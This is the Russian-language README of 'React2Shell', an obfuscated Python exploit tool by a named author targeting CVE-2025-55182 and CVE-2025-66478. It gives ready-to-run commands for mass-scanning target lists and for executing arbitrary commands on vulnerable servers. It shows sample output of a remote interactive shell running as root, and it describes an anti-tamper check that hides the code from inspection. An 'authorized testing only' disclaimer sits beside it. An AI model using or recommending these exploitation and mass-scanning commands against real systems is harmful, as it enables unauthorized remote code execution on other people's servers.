
React2Shell - CVE-2025-55182 & CVE-2025-66478
Автор: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Версия: 2.0.0 (Обфусцированная)
Дата: 2025-12-07
python react2shell.py
Вот и всё! Сканер выполнит:
[1] Сканировать один URL
[2] Сканировать несколько URL из файла
[3] Эксплуатировать один URL
[4] Эксплуатировать несколько URL из файла
[5] Интерактивная оболочка (режим эксплуатации)
[6] Настройки
[7] Просмотреть предыдущие результаты
[0] Выход
python react2shell.py
# Сканирование одного URL
python react2shell.py -u https://target.com
# Сканирование нескольких URL
python react2shell.py -f targets.txt
# Эксплуатация с командой
python react2shell.py -u https://target.com --exploit -c "whoami"
# Массовое сканирование с потоками
python react2shell.py -f targets.txt -t 20 -o results.json
Каждый раз при запуске сканер автоматически:
Если кто-то попытается изменить обфусцированный код:
[ERROR] Проверка целостности сканера НЕ ПРОЙДЕНА!
[!] Код сканера был изменён.
[!] Этот инструмент защищён авторским правом LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Сканер откажется запускаться, если обнаружит любые подозрительные изменения.
Все оригинальные функции сохранены на 100%:
python react2shell.py -u https://example.com
Вывод:
=================================================================
CVE Scanner - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================
[*] Сканирование: https://example.com
[+] УЯЗВИМ: https://example.com
Версия: 15.0.1
CVE-2025-55182: УЯЗВИМ
CVE-2025-66478: УЯЗВИМ
python react2shell.py
# Выберите пункт 5
# Введите целевой URL
Сессия оболочки:
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
Этот инструмент предназначен ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ!
✅ Ваши собственные приложения
✅ Авторизованные тесты на проникновение
✅ Программы bug bounty (в рамках scope)
✅ Исследования безопасности (авторизованные)
❌ Неавторизованное сканирование
❌ Неавторизованная эксплуатация
❌ Любая незаконная деятельность
❌ Нарушение условий обслуживания
Автор (LAKSHMIKANTHAN K) не несёт ответственности за неправильное использование этого инструмента. Пользователи несут полную ответственность за свои действия и должны соблюдать все применимые законы.
Причина: Файл повреждён
Решение: Скачайте новую копию
Причина: Файл был изменён
Решение: Скачайте новую копию (не изменяйте файл)
Причина: Отсутствуют зависимости
Решение:
pip install requests urllib3
Причина: Накладные расходы на распаковку (минимальны)
Примечание: Это происходит только один раз при запуске, затем работает на полной скорости
О: Код обфусцирован и сжат. Если вам нужно прочитать код, используйте оригинальную необфусцированную версию.
О: Минимальное влияние. При запуске есть небольшая задержка на распаковку (~0,1 сек.), затем всё работает на полной скорости.
О: Нет. Любое изменение нарушит проверку целостности, и сканер откажется запускаться.
О: Обфускация — это не шифрование. Решительные злоумышленники всё равно смогут провести обратную разработку, но это очень сложно и требует много времени.
О: Свяжитесь с автором в Instagram: @letchu_pkt
Имя: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Если вы столкнулись с проблемами:
pip install requests urllib3
python react2shell.py
Выберите из интерактивного меню или используйте режим CLI.
Следуйте подсказкам или укажите аргументы командной строки.
# Интерактивный режим
python react2shell.py
# Сканирование одного URL
python react2shell.py -u https://target.com
# Массовое сканирование
python react2shell.py -f targets.txt -t 20
# Эксплуатация
python react2shell.py -u https://target.com --exploit -c "whoami"
# Справка
python react2shell.py --help
LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Спасибо за использование CVE Scanner! 🚀
Версия: 2.0.0 (Обфусцированная)
Дата: 2025-12-07
Лицензия: Только для авторизованного тестирования безопасности